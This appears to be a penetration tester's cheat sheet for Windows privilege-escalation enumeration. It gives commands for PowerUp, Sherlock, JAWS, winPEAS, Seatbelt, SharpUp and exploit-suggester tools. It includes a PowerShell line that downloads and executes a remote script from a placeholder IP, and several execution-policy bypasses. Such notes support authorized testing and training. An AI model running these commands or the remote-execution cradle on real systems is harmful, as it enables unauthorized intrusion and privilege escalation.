enumeration auto
Path fix
set PATH=C:\Windows;C:\Windows\system32;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;%PATH%
Get-ExecutionPolicy -List
Set-ExecutionPolicy UnrestrictedCheck Arch, Process, Release ID
PS> [system.environment]::Is64BitOperatingSystem
PS> [system.environment]::Is64BitProcess
> echo %PROCESSOR_ARCHITECTURE%
PS > Get-ComputerInfo | select WindowsProductName, WindowsVersion, OsHardwareAbstractionLayer
PS> (Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion" -Name ReleaseId).ReleaseId
PS> (Get-WmiObject -class Win32_OperatingSystem).Caption
PS> [System.Environment]::OSVersion.Version# located at /usr/share/windows-resources/powersploit/Privesc/PowerUp.ps1
> powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks -Format List}"
[OR]
PS> . .\PowerUp.ps1
PS> Invoke-AllChecks -Format List> powershell.exe -exec bypass -Command "& {Import-Module .\Sherlock.ps1; Find-AllVulns}"
[OR]
PS> . .\Sherlock.ps1
PS> Find-AllVulns# located at /opt/JAWS/jaws-enum.ps1
> powershell -exec bypass IEX(New-Object Net.WebClient).downloadString('http://IP/jaws.ps1')# located at /opt/Privesc/privesc.ps1
> powershell.exe -exec bypass -Command "& {Import-Module .\p.ps1; Invoke-Privesc -Groups 'Users,Everyone,Authenticated Users' -Whoami -Extended -Long}"# need .NET 4.0
# cmd check
> dir /b %windir%\Microsoft.NET\Framework\v*
> reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"
> reg query "HKLM\SOFTWARE\Microsoft\Net Framework Setup\NDP\v4" /s
# check for .NET using PS
PS> cmd.exe /c dir /b %windir%\Microsoft.NET\Framework\v*
PS> Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP' -Recurse | Get-ItemProperty -Name version -EA 0 | Where { $_.PSChildName -Match '^(?!S)\p{L}'} | Select PSChildName, version
winPEASany.exe quiet [cmd fast] [flag]
# systeminfo; userinfo; processinfo;
# servicesinfo; applicationsinfo; networkinfo;
# windowscreds; browserinfo; filesinfo; eventsinfo# located at /usr/share/windows-resources/Ghostpack-CompiledBinaries/
> .\Seatbelt.exe -group=[all | <check>] -outputfile="FULL-PATH"# located at /usr/share/windows-resources/Ghostpack-CompiledBinaries/
> .\SharpUp.exe# needs python2
# copy .
# FIX: python2 -m pip install 'xlrd==1.2.0'
./windows-exploit-s.py --update
./windows-exploit-s.py -d <DB-FILE> -i <SYSTEMINFO.txt> [--hotfixes <>]
# if cannot get hotfixes using systeminfo
wmic qfe list fullpython3 /opt/wesng/wes.py sys.txt --update
python3 /opt/wesng/wes.py systeminfo.txt [--exploits-only] -o wes.csv
# --impact | -i "Remote Code Execution" | "Elevation of Privilege"
# --severity critical
Last updated